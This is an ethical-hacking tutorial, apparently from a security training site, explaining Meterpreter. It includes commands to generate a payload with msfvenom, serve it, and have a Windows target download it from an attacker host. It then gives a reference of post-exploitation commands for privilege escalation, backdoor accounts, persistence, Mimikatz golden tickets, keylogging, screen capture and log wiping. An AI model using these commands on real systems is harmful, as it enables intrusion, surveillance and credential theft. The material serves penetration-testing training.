If you’ve dabbled with Metasploit, you’re likely aware that it contains a command-line tool called Meterpreter, which stands for “Metasploit Interpreter”.
This advanced payload has been part of Metasploit since 2004 and has C, PHP, Python, and Java implementations.
However, if you want to start with Meterpreter but don’t know where to begin, we’ve got you covered.
In this article, we’ll review what a Meterpreter shell is, whether it’s better than a reverse shell, and various categories of Meterpreter commands, including file manipulation, network surveillance, privilege escalation, and even remote access to the target machine’s hardware components such as its monitor.
Without further ado, let’s dive in.
- What Is a Meterpreter Shell?
- Is a Meterpreter Shell Better Than a Standard Reverse Shell?
- Meterpreter Commands List
- System Information and Management Meterpreter Commands
- Networking Meterpreter Commands
- File System Operations Meterpreter Commands
- User and Group Management Meterpreter Commands
- Privilege Escalation Meterpreter Commands
- Persistence and Lateral Movement Meterpreter Commands
- Capture and Exfiltration Meterpreter Commands
- Defensive Evasion Meterpreter Commands
- Miscellaneous Commands Meterpreter Commands
- Conclusion
- Frequently Asked Questions
What Is a Meterpreter Shell?
Once you’ve successfully exploited a target with Metasploit, the Meterpreter shell appears in the terminal of your attacking machine, granting you access to the target machine.
Many tutorials exist on spawning Meterpreter shells.
The method that led to the screenshots below comes from using msfvenom
to generate an executable file, which gets downloaded to the target machine via the virtual machine bridged adapter.
By double-clicking on the executable file, the target connects to the attacker.
The commands used on the attacking machine (Kali Linux):
msfvenom -p windows/meterpreter_bind_tcp LPORT=443 -f exe -o bind.exe
python3 -m http.server 8000
exploit multi/handler
use payload windows/meterpreter_bind_tcp
set rhost [target-ipv4]
exploit
The commands used on Powershell of the Windows target machine:
wget [attacker-ipv4]:8000/bind.exe -o bind.exe
netstat -an | findstr 443
Let’s briefly compare a Meterpreter shell and a standard reverse shell.
Is a Meterpreter Shell Better Than a Standard Reverse Shell?
Meterpreter has more functions and is more flexible than a standard reverse shell.
Through it, you can access a webcam or microphone remotely, or easily upload and use Mimikatz—through a module called “kiwi,” which is another pen-testing framework.
It also allows you to execute Metasploit modules directly on a target machine rather than write code to the target disk and run it there.
On the other hand, Meterpreter is such a widely known hacking tool that, unsurprisingly, antivirus and IDS/IPS solutions have ways to block it from running.
Additionally, Meterpreter is a Ruby-based framework, while standard reverse shells can use various scripting and shell languages, such as C, Python, Perl, PHP, bash, and Powershell.
Here is a comparison of the features of a Meterpreter shell and a standard reverse shell:
Runs in-memory: injects DLL into existing compromised processes and can migrate to other running processes easily |
Can run Metasploit modules/extensions directly without downloading to the target machine |
Can customize payloads through Meterpreter scripting in Ruby |
Contains functionalities not readily available in standard shells, such as monitor, webcam, and microphone access |
Uses encrypted communications to evade detection |
Spawns new processes on the target machine |
Opens a standard terminal on the target machine |
Functionalities depend on the scripting language used |
Requires the target to have the shellcode downloaded beforehand |
Firewalls and other security systems easily overlook outgoing signals from reverse shell code executed by the target machine |
Meterpreter Commands List
Below we break down the most useful Meterpreter commands into categories. While the full list of commands is massive, the following should provide a reference for the most common and useful ones for you.
- System Information and Management Meterpreter Commands
- Networking Meterpreter Commands
- File System Operations Meterpreter Commands
- User and Group Management Meterpreter Commands
- Privilege Escalation Meterpreter Commands
- Persistence and Lateral Movement Meterpreter Commands
- Capture and Exfiltration Meterpreter Commands
- Defensive Evasion Meterpreter Commands
- Miscellaneous Commands Meterpreter Commands
System Information and Management Meterpreter Commands
The following core commands will help you gather essential information about the target machine.
Command | Explanation |
sysinfo | Display system information. Learn about the target machine’s operating system, architecture, and other basic details. |
getuid | Display user ID. The target machine identifies you as this user. |
getpid | Display the process ID with which Meterpreter is running. By keeping this process alive, you maintain access to your target. |
ps | List and display running processes on the target machine. The ps command identifies vulnerable applications on the target. |
bg/background (Ctrl+Z) | Put the current Meterpreter session in the background. After using this command, you can run other exploits from the attacking machine. |
Networking Meterpreter Commands
These networking commands in Meterpreter help you understand the target’s network structure.
Command | Explanation |
arp | Display the host ARP cache. You can use ARP spoofing to assess the security of a network and identify vulnerabilities. |
getproxy | Display the current proxy configuration. You can obfuscate hacking activities or improve your security posture by using proxies. |
portfwd | Forward packets from a local port to a remote service. This pivoting command relays TCP connections to and from the target machine, granting the attacker direct access. |
route | View and modify the network routing table. You can use this to conduct attacks such as routing table poisoning and hijacking. |
ifconfig/ipconfig | Show network interface configuration. Either command displays a system’s basic networking information, such as IP addresses. |
File System Operations Meterpreter Commands
These commands manipulate files and directories on the attacking (local) and target (remote) machines. Many bash or Windows cmd file system commands apply to Meterpreter, and commands prefixed with the small letter “l” (as in “local”) apply to the attacking machine.
Command | Explanation |
ls/lls | List all remote/local files. Use this to navigate the target and attacking machines to know what exploits to launch and where to launch them. |
pwd/lpwd | Print the current remote/local working directory. If you’re running a server on your attacking machine, such as using the command python3 -m http.server 8000 , you’ll know which directory your target connects to. |
upload/download | Upload/download a file or directory from local/remote to remote/local. Although Meterpreter doesn’t require writing anything to the target disk, this pair of commands may be helpful for executing shellcode on and saving files from the target. |
rm/del | Delete remote files. Either command works on Windows and Linux targets alike. It is especially useful for covering your tracks and cleaning up post-exploitation, and the best part is that nothing deleted using these commands goes into the target’s recycling bin. |
show_mount | List all mount points/logical drives. The list includes hard drives, optical disk drives, and network drives, and you can exploit such vulnerabilities. |
User and Group Management Meterpreter Commands
Some of these commands, such as add_user
, require the Meterpreter extension incognito
(use incognito
). Tokens are temporary keys allowing you to access the target machine and network without providing credentials. This and the next section on Privilege Escalation concern the use of tokens.
Command | Explanation |
add_user | Attempt to add a user with all tokens to the target system. You can use this command to create a backdoor. Later, you can remove it through a shell with admin privileges. In Windows, it’s cmd > net user [username] /delete . |
add_group_user | Attempt to add a user to a global group on a host with all accessible tokens. The purpose of this command is to allow the new user to inherit the group’s privileges. |
getprivs | Attempt to enable all privileges available to the current process on the target. You gain more control and access to the system. |
list_tokens | List all accessible tokens and their privilege level using the options -u to sort by unique user name and -g by unique group name. |
impersonate_token | Instruct the Meterpreter thread to impersonate the specified token. Everything you do from this point onward on the entire system is in the context of that token. |
Privilege Escalation Meterpreter Commands
Here are a few explicit Meterpreter commands that can elevate the attacker’s privilege in the target machine. It would help if you loaded the “privs
” extension before using the “getsystem
” command.
Command | Explanation |
getsystem | Attempt to elevate your privilege to that of the target (local) system. You can gain admin- or root-level access with the command. |
steal_token [PID] | Attempt to steal an impersonation token from the target process marked by PID. Usually, you aim for a user with higher privileges so that you can control the process. |
drop_token [PID] | Relinquishes any active impersonation token. Using this command drops a specified privilege token from the current process PID, reducing the level of privileges. |
rev2self | Attempt to revert to the original token, which will be useful after privilege escalation. This command helps if you’ve made a mistake escalating to the wrong set of privileges. |
Persistence and Lateral Movement Meterpreter Commands
Hackers need to learn how to maintain a Meterpreter session and move across different virtual spaces for greater flexibility and to evade detection. The Kiwi extension in Meterpreter is Mimikatz 2.0.
Command | Explanation |
run [persistence] | Run a Meterpreter payload [persistence] on the target machine to maintain access or create a persistent backdoor. Persistence is especially key for conducting prolonged attacks in stealth.Meterpreter command Windows: exploit/windows/local/persistence Meterprter command Linux:exploit/linux/local/service_persistence, exploit/linux/local/cron_persistence (or similar) |
use kiwi | Load the Kiwi (Mimikatz 2.0) module onto the current Meterpreter session. You must run this command before using any Kiwi commands below. |
kiwi_cmd [option] | Execute an arbitrary Mimikatz command (unparsed) via Meterpreter. The help menu comes with some fun commands, and if you’re familiar with Mimikatz, you’ll love this. |
golden_ticket_create [options] | Create a golden Kerberos ticket. The namesake refers to the all-access golden ticket in the novel Charlie and the Chocolate Factory. Unlike an ordinary “ticket granting ticket” (TGT) issued through the Kerberos Key Distribution Center (KDC), a golden Kerberos ticket allows you to bypass vital layers of authentication and can be dangerous in the wrong hands. |
run autoroute | Insert routes for the target to Metasploit’s routing table so that Metasploit knows how to route traffic through the session. The autoroute module is another pivot. The general use of the run command is to execute a Meterpreter script.Sometimes, this command may generate warning messages. Alternatively, use the command run post/multi/manage/autoroute instead. |
Capture and Exfiltration Meterpreter Commands
Here are a few user interface commands to transfer data from the target machine. The help menu (meterpreter > help
) lists other commands for hijacking the target’s sound system and webcams, such as play, record_mic,
and webcam_list
.
Command | Explanation |
screenshot | Grab a screenshot of the target’s interactive desktop. Keep a record of your observations on the target machine for security audits. |
screenshare | Watch the remote user’s desktop in real time. This command is helpful when your attack takes place over some time, such as several hours, and you want to see how it unfolds. |
keyscan_start/keyscan_stop | Start/stop capturing keystrokes on the target. Keyscan functions as a keylogger and tracks the target’s keyboard input. |
keyscan_dump | Dump buffer of keystrokes on the target. Use this command between keyscan_start and keyscan_stop to see what the target user has been typing. |
enumdesktops | List all accessible desktops (separate graphical environments) and Windows stations of the target. Each item on the list has a session ID to which you can apply Meterpreter commands specific to a particular desktop. |
Defensive Evasion Meterpreter Commands
During ethical hacking, the target system may catch you red-handed. What can you do to prevent such an outcome or minimize your damage?
Command | Explanation |
clearev | Clear the event logs on the target system. You can’t afford to leave traces of your break-in there, so you must remove all your digital footprints before exiting the target machine. |
timestomp | Manipulate timestamps of affected files to cover your tracks. This command is a wordplay on “timestamp” and “stomp” as if to stomp out metadata changes as if nothing’s ever happened. |
migrate | Move the Meterpreter session to another process. You’d use this command often for stealth because it’s in your best interest to keep the Meterpreter shell connection alive for as long as possible. |
uictl | Freeze the keyboard, mouse, or both on the target machine. The options are enable/disable keyboard/mouse/all . You can cover your tracks while the target user wonders what’s going on. |
Miscellaneous Commands Meterpreter Commands
Here are some useful Meterpreter commands belonging to one or more categories above.
Command | Explanation |
shell | Drop into a system command shell. You can execute (reverse) shell code from the terminal of the target machine as if you were a legitimate user. |
execute | Execute a command. You can execute (reverse) shell code on the target machine without entering the shell. Usage: execute -f [file] [options] The options are: -H : Create the process hidden from view-a : The arguments to pass to the command-c : Channelized I/O (required for interaction)-d : The ‘dummy’ executable to launch when using -m -f : The executable command to run-h : Help menu-i : Interact with the process after creating it-m : Execute from memory-t : Execute the process using the currently impersonated thread token |
help/? | Display the Meterpreter help menu. Learn new Meterpreter commands and refresh your memory on those you’ve understood. |
localtime | Display the local date and time of the target system. This information is crucial to minimize the amount of suspicious data on the target machine. |
idletime | Display the number of seconds the user has been idle on the remote system. This command is useful because you may encounter timeouts on your target machine, which can hinder you from completing attacks or covering your tracks. |
Conclusion
We hope this list of Meterpreter commands helps you get started with Meterpreter shell commands and wield Meterpreter like a pro. Those interested in ethical hacking and penetration testing would benefit from mastery of Meterpreter.
Don’t forget to check out our StationX Membership to access a wide range of ethical hacking, penetration testing, and related courses. If you intend to pursue a career in these fields, we have handpicked a selection of courses for you below, and we wish you success.